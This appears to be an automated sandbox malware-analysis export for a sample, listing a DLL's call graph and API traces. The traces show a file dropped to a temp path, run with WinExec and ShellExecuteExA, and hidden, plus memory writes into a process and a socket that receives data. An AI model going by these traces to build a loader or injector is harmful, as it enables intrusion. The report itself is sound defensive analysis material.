WaitForSingleObject CloseHandle 29530->29532 29536 10015700 9 API calls 29531->29536 29532->29531 29534 10015d22 29533->29534 29535 10002cb0 _invalid_parameter_noinfo_noreturn 29534->29535 29537 10015d31 29535->29537 29538 10015d55 29536->29538 29539 10002cb0 _invalid_parameter_noinfo_noreturn 29537->29539 29540 10015d72 CopyFileA 29538->29540 29539->29508 29541 10002cb0 _invalid_parameter_noinfo_noreturn 29540->29541 29542 10015d84 ShellExecuteA 29541->29542 29585 10001660 GetModuleHandleA 29542->29585 29545 10002cb0 _invalid_parameter_noinfo_noreturn 29546 10015db3 29545->29546 29547 10002cb0 _invalid_parameter_noinfo_noreturn 29546->29547 29548 10015dc2 29547->29548 29549 10002cb0 _invalid_parameter_noinfo_noreturn 29548->29549 29549->29508 29550->29492 29552 10002da0 8 API calls 29551->29552 29553 10015798 29552->29553 29615 10002b10 29553->29615 29556 100157b7 29619 10002ad0 9 API calls _Error_objects 29556->29619 29558 100157cc 29560 10002cb0 _invalid_parameter_noinfo_noreturn 29558->29560 29559 100157e9 29561 10002cb0 _invalid_parameter_noinfo_noreturn 29559->29561 29562 100157e4 29560->29562 29561->29562 29562->29496 29628 10015400 29563->29628 29566 10015700 GetModuleFileNameA 29567 10002da0 8 API calls 29566->29567 29568 10015733 29567->29568 29568->29500 29570 10012660 HandleT 29569->29570 29633 10013cd0 29570->29633 29572 10012699 29573 10005400 29572->29573 29574 10005431 _Error_objects 29573->29574 29669 100127e0 29574->29669 29576 10005455 HandleT 29577 1000549d 29576->29577 29676 100128b0 29576->29676 29577->29512 29683 10014400 29579->29683 29581 100138b2 29581->29519 29708 100130b0 29582->29708 29586 10002da0 8 API calls 29585->29586 29587 100016a3 29586->29587 29713 10001510 29587->29713 29591 100016d1 29592 10002cb0 _invalid_parameter_noinfo_noreturn 29591->29592 29593 100016dc 29592->29593 29594 10002cb0 _invalid_parameter_noinfo_noreturn 29593->29594 29595 100016ee 29594->29595 29725 10001430 29595->29725 29599 10001723 29741 10003bc0 
29599->29741 29601 10001748 29602 10002cd0 _invalid_parameter_noinfo_noreturn 29601->29602 29603 1000175c 29602->29603 29604 10002cb0 _invalid_parameter_noinfo_noreturn 29603->29604 29605 10001767 29604->29605 29606 10002cb0 _invalid_parameter_noinfo_noreturn 29605->29606 29607 10001776 29606->29607 29608 10002cb0 _invalid_parameter_noinfo_noreturn 29607->29608 29609 10001788 CreateThread RegisterClassW GetSystemMetrics GetSystemMetrics 29608->29609 29744 10001580 29609->29744 29809 10005760 29609->29809 29611 1000182f CreateWindowExW ShowWindow 29612 1000188a KiUserCallbackDispatcher 29611->29612 29613 100018b5 29612->29613 29614 1000189e TranslateMessage DispatchMessageW 29612->29614 29613->29545 29614->29612 29616 10002b22 Concurrency::task_continuation_context::task_continuation_context 29615->29616 29620 10003dc0 29616->29620 29618 10002b55 29618->29556 29618->29559 29619->29558 29621 10003dd3 29620->29621 29625 10003e1f _Min_value 29620->29625 29621->29625 29626 10003e90 memset 29621->29626 29623 10003de8 29623->29625 29627 10004860 memchr _Min_value char_traits 29623->29627 29625->29618 29626->29623 29627->29625 29632 100153f0 29628->29632 29630 1001541d __stdio_common_vsprintf 29631 10015439 29630->29631 29631->29566 29632->29630 29634 10013cf6 Concurrency::task_continuation_context::task_continuation_context 29633->29634 29635 10013d70 _Error_objects 29634->29635 29641 10014390 29634->29641 29635->29572 29639 10013d51 29648 10014230 _invalid_parameter_noinfo_noreturn 29639->29648 29642 1001439f 29641->29642 29645 100143a9 29642->29645 29653 10013090 ?_Xlength_error@std@@YAXPBD 29642->29653 29649 10014860 29645->29649 29647 10014ec0 memcpy HandleT 29647->29639 29648->29635 29650 10014893 Concurrency::task_continuation_context::task_continuation_context 29649->29650 29654 10004a70 29650->29654 29653->29645 29657 10004ac0 29654->29657 29658 10004ad0 allocator 29657->29658 29661 10004af0 29658->29661 29662 10004afd 29661->29662 29667 10004a81 29661->29667 
29663 10004b14 29662->29663 29664 10004b06 29662->29664 29665 10001350 allocator 4 API calls 29663->29665 29668 10004b70 6 API calls allocator 29664->29668 29665->29667 29667->29647 29668->29667 29670 100127f4 29669->29670 29671 100127f6 29669->29671 29670->29576 29671->29670 29672 1001280e 29671->29672 29674 1001283c Concurrency::task_continuation_context::task_continuation_context 29671->29674 29680 10013ed0 9 API calls 3 library calls 29672->29680 29674->29670 29681 100131d0 _invalid_parameter_noinfo_noreturn memcpy HandleT _Error_objects Concurrency::task_continuation_context::task_continuation_context 29674->29681 29677 10012914 29676->29677 29678 100128cd Concurrency::task_continuation_context::task_continuation_context 29676->29678 29682 10013fe0 9 API calls 3 library calls 29677->29682 29678->29576 29680->29670 29681->29670 29682->29678 29684 1001442c _Error_objects Concurrency::task_continuation_context::task_continuation_context 29683->29684 29685 100144c7 _Error_objects Concurrency::task_continuation_context::task_continuation_context 29684->29685 29686 10014518 Concurrency::task_continuation_context::task_continuation_context 29684->29686 29701 100036d0 memcpy 29685->29701 29687 100145d3 Concurrency::task_continuation_context::task_continuation_context 29686->29687 29690 10014568 HandleT _Error_objects 29686->29690 29693 100145ee Concurrency::task_continuation_context::task_continuation_context 29687->29693 29704 10001410 ?_Xlength_error@std@@YAXPBD 29687->29704 29702 100039e0 memcpy 29690->29702 29692 100145a9 Concurrency::task_continuation_context::task_continuation_context 29703 100036d0 memcpy 29692->29703 29705 100048e0 6 API calls Concurrency::task_continuation_context::task_continuation_context 29693->29705 29696 1001462d HandleT Concurrency::task_continuation_context::task_continuation_context 29706 100036d0 memcpy 29696->29706 29698 1001467a Concurrency::task_continuation_context::task_continuation_context 29707 100036d0 memcpy 29698->29707 
29700 10014507 _Error_objects 29700->29581 29701->29700 29702->29692 29703->29700 29704->29693 29705->29696 29706->29698 29707->29700 29709 100130d6 _Error_objects Concurrency::task_continuation_context::task_continuation_context 29708->29709 29711 1001262f 29709->29711 29712 10003a90 _invalid_parameter_noinfo_noreturn allocator 29709->29712 29711->29523 29712->29711 29714 10002b10 2 API calls 29713->29714 29715 1000152c 29714->29715 29716 10001535 29715->29716 29717 10001558 29715->29717 29758 10002ad0 9 API calls _Error_objects 29716->29758 29759 10002e20 29717->29759 29720 1000154a 29721 10002cd0 29720->29721 29722 10002ce2 HandleT Concurrency::task_continuation_context::task_continuation_context 29721->29722 29723 10003230 _invalid_parameter_noinfo_noreturn 29722->29723 29724 10002cea 29722->29724 29723->29724 29724->29591 29778 10002ec0 29725->29778 29727 1000146b SHGetKnownFolderPath 29728 100014e7 29727->29728 29729 1000149a wcstombs 29727->29729 29780 10002c90 10 API calls 29728->29780 29731 10002da0 8 API calls 29729->29731 29733 100014c2 29731->29733 29732 100014f4 29738 10003b90 29732->29738 29734 10002cd0 _invalid_parameter_noinfo_noreturn 29733->29734 29735 100014d1 29734->29735 29736 10002cb0 _invalid_parameter_noinfo_noreturn 29735->29736 29737 100014d9 CoTaskMemFree 29736->29737 29737->29732 29781 10002c20 29738->29781 29740 10003ba7 29740->29599 29793 10002c50 29741->29793 29743 10003bd7 29743->29601 29745 100015a2 29744->29745 29748 100015d9 _Error_objects 29744->29748 29805 10015f82 AcquireSRWLockExclusive ReleaseSRWLockExclusive SleepConditionVariableSRW 29745->29805 29747 100015ac 29747->29748 29806 1001631a _crt_atexit _register_onexit_function _Error_objects 29747->29806 29797 10003ac0 29748->29797 29751 100015cc 29807 10015f31 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 29751->29807 29752 10001629 29801 10002980 29752->29801 29755 1000163a 29756 10002960 _invalid_parameter_noinfo_noreturn 29755->29756 29757 
10001642 29756->29757 29757->29611 29758->29720 29760 10002e4c HandleT Concurrency::task_continuation_context::task_continuation_context 29759->29760 29763 10004020 29760->29763 29762 10002e9e 29762->29720 29764 10004037 Concurrency::task_continuation_context::task_continuation_context 29763->29764 29766 10004041 Concurrency::task_continuation_context::task_continuation_context 29764->29766 29774 10001410 ?_Xlength_error@std@@YAXPBD 29764->29774 29767 1000406b 29766->29767 29769 1000409b Concurrency::task_continuation_context::task_continuation_context 29766->29769 29775 100036d0 memcpy 29767->29775 29776 100048e0 6 API calls Concurrency::task_continuation_context::task_continuation_context 29769->29776 29771 100040c2 HandleT Concurrency::task_continuation_context::task_continuation_context 29777 100036d0 memcpy 29771->29777 29773 1000408d _Error_objects 29773->29762 29774->29766 29775->29773 29776->29771 29777->29773 29779 10002ef1 _Error_objects 29778->29779 29779->29727 29780->29732 29782 10002c30 HandleT 29781->29782 29785 100032f0 29782->29785 29784 10002c49 29784->29740 29786 10003310 Concurrency::task_continuation_context::task_continuation_context 29785->29786 29787 1000335d 29785->29787 29791 100039e0 memcpy 29786->29791 29792 10004150 9 API calls 3 library calls 29787->29792 29789 1000333b Concurrency::task_continuation_context::task_continuation_context 29789->29784 29791->29789 29792->29789 29794 10002c6a Concurrency::task_continuation_context::task_continuation_context 29793->29794 29795 100032f0 10 API calls 29794->29795 29796 10002c7d 29795->29796 29796->29743 29799 10003af5 HandleT 29797->29799 29798 10003b32 29798->29752 29799->29798 29808 100046f0 8 API calls 2 library calls 29799->29808 29802 10002992 HandleT Concurrency::task_continuation_context::task_continuation_context 29801->29802 29803 10002fb0 _invalid_parameter_noinfo_noreturn 29802->29803 29804 1000299a 29802->29804 29803->29804 29804->29755 29805->29747 29806->29751 29807->29748 
29808->29798 29810 10005798 29809->29810 29811 10002da0 8 API calls 29810->29811 29812 100057ae 29811->29812 29813 10002e20 8 API calls 29812->29813 29814 100057c5 _Smanip _Error_objects 29813->29814 29815 10012640 9 API calls 29814->29815 29816 10005e28 _Smanip _Error_objects 29815->29816 29817 10012640 9 API calls 29816->29817 29818 1000a1cb 29817->29818 29819 10005400 9 API calls 29818->29819 29820 1000a1e2 29819->29820 29821 10005400 9 API calls 29820->29821 29822 1000a1fc _Error_objects 29821->29822 30089 10004fe0 29822->30089 29825 10002cd0 _invalid_parameter_noinfo_noreturn 29826 1000a253 29825->29826 29827 10002cb0 _invalid_parameter_noinfo_noreturn 29826->29827 29828 1000a25e 29827->29828 29829 10004fe0 17 API calls 29828->29829 29830 1000a272 29829->29830 29831 10002cd0 _invalid_parameter_noinfo_noreturn 29830->29831 29832 1000a28d 29831->29832 29833 10002cb0 _invalid_parameter_noinfo_noreturn 29832->29833 29834 1000a298 GetTempPathA 29833->29834 29836 10002da0 8 API calls 29834->29836 29837 1000a373 _Smanip _Error_objects 29836->29837 29838 10012640 9 API calls 29837->29838 29839 1000a3fc 29838->29839 29840 10005400 9 API calls 29839->29840 29841 1000a413 29840->29841 29842 10012620 _invalid_parameter_noinfo_noreturn 29841->29842 29843 1000a425 29842->29843 29844 10002e20 8 API calls 29843->29844 29845 1000a44b 29844->29845 30113 10005250 29845->30113 29847 1000a457 _Smanip _Error_objects 29848 10012640 9 API calls 29847->29848 29849 1000a50d 29848->29849 29850 10005400 9 API calls 29849->29850 29851 1000a524 29850->29851 30120 100138d0 29851->30120 29853 1000a557 29854 10002cb0 _invalid_parameter_noinfo_noreturn 29853->29854 29855 1000a569 29854->29855 29856 10012620 _invalid_parameter_noinfo_noreturn 29855->29856 29857 1000a578 29856->29857 30123 10005520 DeleteFileA 29857->30123 29859 1000a58a 29860 10002da0 8 API calls 29859->29860 29861 1000a5a4 29860->29861 30125 10005300 29861->30125 29864 10002cb0 _invalid_parameter_noinfo_noreturn 29865 1000a5cd 
Sleep 29864->29865 29866 1000a5e5 29865->29866 29867 10002da0 8 API calls 29866->29867 29868 1000a5f1 _Smanip _Error_objects 29867->29868 29869 10012640 9 API calls 29868->29869 29870 1000a666 29869->29870 29871 10005400 9 API calls 29870->29871 29872 1000a67d 29871->29872 29873 10002e20 8 API calls 29872->29873 29874 1000a6c7 29873->29874 29875 10005250 13 API calls 29874->29875 29876 1000a6d3 29875->29876 29877 10002cb0 _invalid_parameter_noinfo_noreturn 29876->29877 29878 1000a6eb 29877->29878 29879 10012620 _invalid_parameter_noinfo_noreturn 29878->29879 29880 1000a6fa 29879->29880 29881 10002cb0 _invalid_parameter_noinfo_noreturn 29880->29881 29882 1000a709 29881->29882 29883 10002da0 8 API calls 29882->29883 29884 1000a721 _Smanip _Error_objects 29883->29884 29885 10012640 9 API calls 29884->29885 29886 1000a79a 29885->29886 29887 10005400 9 API calls 29886->29887 29888 1000a7b1 29887->29888 29889 10002e20 8 API calls 29888->29889 29890 1000a7fb 29889->29890 29891 10005250 13 API calls 29890->29891 29892 1000a807 29891->29892 29893 10002cd0 _invalid_parameter_noinfo_noreturn 29892->29893 29894 1000a82e 29893->29894 29895 10002cb0 _invalid_parameter_noinfo_noreturn 29894->29895 29896 1000a839 29895->29896 29897 10002cb0 _invalid_parameter_noinfo_noreturn 29896->29897 29898 1000a848 29897->29898 29899 10012620 _invalid_parameter_noinfo_noreturn 29898->29899 29900 1000a857 29899->29900 29901 10002cb0 _invalid_parameter_noinfo_noreturn 29900->29901 29902 1000a866 29901->29902 30136 100139a0 29902->30136 29906 1000a8ad 29907 10013a30 9 API calls 29906->29907 29908 1000a8db 29907->29908 29909 10013a30 9 API calls 29908->29909 29910 1000a909 29909->29910 29911 10013a30 9 API calls 29910->29911 29912 1000a937 29911->29912 29913 10013a30 9 API calls 29912->29913 29914 1000a965 29913->29914 29915 10013a30 9 API calls 29914->29915 29916 1000a993 29915->29916 29917 10013a30 9 API calls 29916->29917 29918 1000a9c1 29917->29918 29919 10013a30 9 API calls 29918->29919 29920 
1000a9ef 29919->29920 29921 10013a30 9 API calls 29920->29921 29922 1000aa1d 29921->29922 29923 10013a30 9 API calls 29922->29923 29924 1000aa4b 29923->29924 29925 10013a30 9 API calls 29924->29925 29926 1000aa79 29925->29926 29927 10002cb0 _invalid_parameter_noinfo_noreturn 29926->29927 29928 1000aa8b 29927->29928 29929 10002cb0 _invalid_parameter_noinfo_noreturn 29928->29929 29930 1000aa9a 29929->29930 29931 10002cb0 _invalid_parameter_noinfo_noreturn 29930->29931 29932 1000aaa9 29931->29932 29933 10002cb0 _invalid_parameter_noinfo_noreturn 29932->29933 29934 1000aab8 29933->29934 29935 10002cb0 _invalid_parameter_noinfo_noreturn 29934->29935 29936 1000aac7 29935->29936 29937 10002cb0 _invalid_parameter_noinfo_noreturn 29936->29937 29938 1000aad6 29937->29938 29939 10002cb0 _invalid_parameter_noinfo_noreturn 29938->29939 29940 1000aae5 29939->29940 29941 10002cb0 _invalid_parameter_noinfo_noreturn 29940->29941 29942 1000aaf4 29941->29942 29943 10002cb0 _invalid_parameter_noinfo_noreturn 29942->29943 29944 1000ab03 29943->29944 29945 10002cb0 _invalid_parameter_noinfo_noreturn 29944->29945 29946 1000ab12 29945->29946 29947 10002cb0 _invalid_parameter_noinfo_noreturn 29946->29947 29948 1000ab21 29947->29948 29949 10005520 DeleteFileA 29948->29949 29950 1000ab33 29949->29950 29951 10002da0 8 API calls 29950->29951 29952 1000ab4d 29951->29952 29953 10005300 31 API calls 29952->29953 29954 1000ab64 29953->29954 29955 10002cb0 _invalid_parameter_noinfo_noreturn 29954->29955 29956 1000ab76 Sleep 29955->29956 29957 1000ab8e _Smanip _Error_objects 29956->29957 29958 10012640 9 API calls 29957->29958 29959 1000addd 29958->29959 29960 10005400 9 API calls 29959->29960 29961 1000adf4 _Smanip _Error_objects 29960->29961 29962 10012640 9 API calls 29961->29962 29963 1000ae9a 29962->29963 29964 10005400 9 API calls 29963->29964 29965 1000aeb1 29964->29965 29966 10013890 9 API calls 29965->29966 29967 1000aef0 29966->29967 29968 10002cb0 _invalid_parameter_noinfo_noreturn 
29967->29968 29969 1000af02 29968->29969 29970 10012620 _invalid_parameter_noinfo_noreturn 29969->29970 29971 1000af11 29970->29971 29972 10002cb0 _invalid_parameter_noinfo_noreturn 29971->29972 29973 1000af20 29972->29973 29974 10012620 _invalid_parameter_noinfo_noreturn 29973->29974 29975 1000af2f 29974->29975 29976 1000af3d WinExec Sleep 29975->29976 29977 1000af5b _Smanip _Error_objects 29976->29977 29978 10012640 9 API calls 29977->29978 29979 1000b07c 29978->29979 29980 10005400 9 API calls 29979->29980 29981 1000b093 29980->29981 29982 10012620 _invalid_parameter_noinfo_noreturn 29981->29982 29983 1000b0a5 _Smanip _Error_objects 29982->29983 29984 10012640 9 API calls 29983->29984 29985 1000b118 29984->29985 29986 10005400 9 API calls 29985->29986 29987 1000b12f 29986->29987 29988 10003bc0 10 API calls 29987->29988 29989 1000b162 29988->29989 29990 10003b90 10 API calls 29989->29990 29991 1000b1a1 29990->29991 29992 10002cd0 _invalid_parameter_noinfo_noreturn 29991->29992 29993 1000b1bc 29992->29993 29994 10002cb0 _invalid_parameter_noinfo_noreturn 29993->29994 29995 1000b1c7 29994->29995 29996 10002cb0 _invalid_parameter_noinfo_noreturn 29995->29996 29997 1000b1d6 29996->29997 29998 10002cb0 _invalid_parameter_noinfo_noreturn 29997->29998 29999 1000b1e5 29998->29999 30000 10012620 _invalid_parameter_noinfo_noreturn 29999->30000 30001 1000b1f4 memset 30000->30001 30002 10002b60 30001->30002 30003 1000b245 ShellExecuteExA 30002->30003 30004 1000b270 30003->30004 30005 1000b29b 30003->30005 30007 1000b296 30004->30007 30008 1000b279 WaitForSingleObject CloseHandle 30004->30008 30006 10002cb0 _invalid_parameter_noinfo_noreturn 30005->30006 30009 1000b2b4 30006->30009 30010 1000b3a3 Sleep 30007->30010 30063 1000b548 30007->30063 30008->30007 30012 10002cb0 _invalid_parameter_noinfo_noreturn 30009->30012 30011 1000b3ba 30010->30011 30014 10002da0 8 API calls 30011->30014 30013 1000b2c3 30012->30013 30015 10002cb0 _invalid_parameter_noinfo_noreturn 30013->30015 
30016 1000b3c6 30014->30016 30017 1000b2d2 30015->30017 30145 10005740 30016->30145 30019 10002cb0 _invalid_parameter_noinfo_noreturn 30017->30019 30021 1000b2e1 30019->30021 30020 1000b3d6 30022 10002cb0 _invalid_parameter_noinfo_noreturn 30020->30022 30023 10002cb0 _invalid_parameter_noinfo_noreturn 30021->30023 30025 1000b3e8 30022->30025 30024 1000b2f0 30023->30024 30026 10002cb0 _invalid_parameter_noinfo_noreturn 30024->30026 30029 10002da0 8 API calls 30025->30029 30027 1000b2ff 30026->30027 30028 10002cb0 _invalid_parameter_noinfo_noreturn 30027->30028 30030 1000b30e 30028->30030 30031 1000b400 30029->30031 30032 10002cb0 _invalid_parameter_noinfo_noreturn 30030->30032 30033 10005740 SetFileAttributesA 30031->30033 30034 1000b31d 30032->30034 30035 1000b410 30033->30035 30036 10002cb0 _invalid_parameter_noinfo_noreturn 30034->30036 30037 10002cb0 _invalid_parameter_noinfo_noreturn 30035->30037 30038 1000b32c 30036->30038 30039 1000b422 30037->30039 30040 10002cb0 _invalid_parameter_noinfo_noreturn 30038->30040 30042 10005520 DeleteFileA 30039->30042 30041 1000b33b 30040->30041 30043 10002cb0 _invalid_parameter_noinfo_noreturn 30041->30043 30044 1000b434 30042->30044 30045 1000b34a 30043->30045 30048 10005520 DeleteFileA 30044->30048 30046 10002cb0 _invalid_parameter_noinfo_noreturn 30045->30046 30047 1000b359 30046->30047 30049 10012620 _invalid_parameter_noinfo_noreturn 30047->30049 30051 1000b448 30048->30051 30050 1000b368 30049->30050 30052 10012620 _invalid_parameter_noinfo_noreturn 30050->30052 30053 10002cb0 _invalid_parameter_noinfo_noreturn 30051->30053 30054 1000b377 30052->30054 30055 1000b464 30053->30055 30056 10002cb0 _invalid_parameter_noinfo_noreturn 30054->30056 30057 10002cb0 _invalid_parameter_noinfo_noreturn 30055->30057 30058 1000b386 30056->30058 30059 1000b473 30057->30059 30060 10002cb0 _invalid_parameter_noinfo_noreturn 30058->30060 30061 10002cb0 _invalid_parameter_noinfo_noreturn 30059->30061 30060->30007 30062 1000b482 
30061->30062 30064 10002cb0 _invalid_parameter_noinfo_noreturn 30062->30064 30065 1000b491 30064->30065 30066 10002cb0 _invalid_parameter_noinfo_noreturn 30065->30066 30067 1000b4a0 30066->30067 30068 10002cb0 _invalid_parameter_noinfo_noreturn 30067->30068 30069 1000b4af 30068->30069 30070 10002cb0 _invalid_parameter_noinfo_noreturn 30069->30070 30071 1000b4be 30070->30071 30072 10002cb0 _invalid_parameter_noinfo_noreturn 30071->30072 30073 1000b4cd 30072->30073 30074 10002cb0 _invalid_parameter_noinfo_noreturn 30073->30074 30075 1000b4dc 30074->30075 30076 10002cb0 _invalid_parameter_noinfo_noreturn 30075->30076 30077 1000b4eb 30076->30077 30078 10002cb0 _invalid_parameter_noinfo_noreturn 30077->30078 30079 1000b4fa 30078->30079 30080 10002cb0 _invalid_parameter_noinfo_noreturn 30079->30080 30081 1000b509 30080->30081 30082 10012620 _invalid_parameter_noinfo_noreturn 30081->30082 30083 1000b518 30082->30083 30084 10012620 _invalid_parameter_noinfo_noreturn 30083->30084 30085 1000b527 30084->30085 30086 10002cb0 _invalid_parameter_noinfo_noreturn 30085->30086 30087 1000b536 30086->30087 30088 10002cb0 _invalid_parameter_noinfo_noreturn 30087->30088 30088->30063 30090 1000500a 30089->30090 30148 100125c0 30090->30148 30093 10005028 30095 100050db _Error_objects 30093->30095 30164 10012600 9 API calls 30093->30164 30094 100050c9 30094->30095 30096 100050f7 30094->30096 30097 1000512c 30094->30097 30154 100137c0 30095->30154 30165 10012600 9 API calls 30096->30165 30166 10012600 9 API calls 30097->30166 30101 100051dd 30158 10004ee0 MultiByteToWideChar 30101->30158 30102 1000515c 30167 10012600 9 API calls 30102->30167 30104 1000518a 30106 100051ef 30107 10002da0 8 API calls 30106->30107 30108 10005201 _MallocaArrayHolder 30107->30108 30109 10002cb0 _invalid_parameter_noinfo_noreturn 30108->30109 30110 1000522b 30109->30110 30111 10012620 _invalid_parameter_noinfo_noreturn 30110->30111 30112 1000523a 30111->30112 30112->29825 30116 10005280 30113->30116 30115 

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                      • Part of subcall function 004221FC: LoadLibraryA.KERNEL32(?), ref: 004222E4
                                                                                    • VirtualAlloc.KERNEL32(00000000,0001E000,00003000,00000040), ref: 00421E22
                                                                                    • WSAStartup.WS2_32(00000202,?), ref: 00421E52
                                                                                    • socket.WS2_32(00000002,00000001,00000000), ref: 00421E5E
                                                                                    • VirtualProtect.KERNEL32(?,00000001,00000040,?), ref: 0042206B
                                                                                    • WriteProcessMemory.KERNEL32(000000FF,?,?,00000064,?), ref: 00422081
                                                                                    • connect.WS2_32(?,?,00000010), ref: 00422098
                                                                                    • recv.WS2_32(?,?,00001000,00000000), ref: 004220BA
                                                                                    • closesocket.WS2_32(?), ref: 004220F0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Virtual$AllocLibraryLoadMemoryProcessProtectStartupWriteclosesocketconnectrecvsocket
                                                                                    • String ID: -$-$-$.$.$.$.$.$.$.$/$/$/$1$3$5$6$:$R$U$a$a$a$c$c$e$e$e$h$h$i$k$l$m$n$o$o$o$p$p$p$p$r$s$s$s$s$s$s$s$t$t$t$t$u$u$v$w$x$x$y$y
                                                                                    • API String ID: 1908411163-4220177053
                                                                                    • Opcode ID: 0a5c0964fa35a880765474ee3d056f93aba7d148df484ba7d181343147612299
                                                                                    • Instruction ID: 6eba19237a2e4297c06948fbfb06263f303c5671ab06a48b70b181f2cbbdbc92
                                                                                    • Opcode Fuzzy Hash: 0a5c0964fa35a880765474ee3d056f93aba7d148df484ba7d181343147612299
                                                                                    • Instruction Fuzzy Hash: C081FD20D083D8DEEB21C7A8D84CBDDBFB55F12748F184199D1887B282C7FA1589CB66
                                                                                    APIs
                                                                                    • GetNativeSystemInfo.KERNEL32(?), ref: 00CD04AE
                                                                                    • VirtualAlloc.KERNEL32(?,?,00003000,00000004), ref: 00CD04DE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2077740458.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_cd0000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocInfoNativeSystemVirtual
                                                                                    • String ID: A$A$Cach$F$Fu$G$Li$Lo$P$Rt$S$Syst$Ta$Vi$Via$a$a$a$a$b$b$ctio$ee$fo$iv$mI$o$oc$otec$p$st$t$tNat$tu$tu$ucti$ushI$yA
                                                                                    • API String ID: 2032221330-2899676511
                                                                                    • Opcode ID: 82ef88a58992c726dca534e4f3eff6f5ce2a19202078a525a2214f4ed1b422dd
                                                                                    • Instruction ID: 92b099bfd9c4fa2633575a8a1bdf175508938e56ea1e7b4a0c1b1bbc9fb17c3c
                                                                                    • Opcode Fuzzy Hash: 82ef88a58992c726dca534e4f3eff6f5ce2a19202078a525a2214f4ed1b422dd
                                                                                    • Instruction Fuzzy Hash: 37626A315083858FD720CF28C840BABBBE5FF94704F24492EEAD99B351E7749A49CB56
                                                                                    APIs
                                                                                    • GetUserDefaultUILanguage.KERNEL32(00000003,?,00000004,00000000,0040CA7C,?,?), ref: 0040C9EE
                                                                                    • GetLocaleInfoW.KERNEL32(?,00000003,?,00000004,00000000,0040CA7C,?,?), ref: 0040C9F7
                                                                                      • Part of subcall function 0040C86C: FindFirstFileW.KERNEL32(00000000,?,00000000,0040C8CA,?,?), ref: 0040C89F
                                                                                      • Part of subcall function 0040C86C: FindClose.KERNEL32(00000000,00000000,?,00000000,0040C8CA,?,?), ref: 0040C8AF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                                                                                    • String ID:
                                                                                    • API String ID: 3216391948-0
                                                                                    • Opcode ID: cba53f77fa6c43a58e77711aeefb5a73a992831c97479b4bd05ea56ffe174a68
                                                                                    • Instruction ID: dd154ea817c974e97ef7d73b686066fe5e2276528df8cc7754812583d82bc4d2
                                                                                    • Opcode Fuzzy Hash: cba53f77fa6c43a58e77711aeefb5a73a992831c97479b4bd05ea56ffe174a68
                                                                                    • Instruction Fuzzy Hash: F8116370B00109DBDB00FBA6D982AAEB7B8EF45704F50457FA504B76D2DB385E058B59
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000000,0040C8CA,?,?), ref: 0040C89F
                                                                                    • FindClose.KERNEL32(00000000,00000000,?,00000000,0040C8CA,?,?), ref: 0040C8AF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
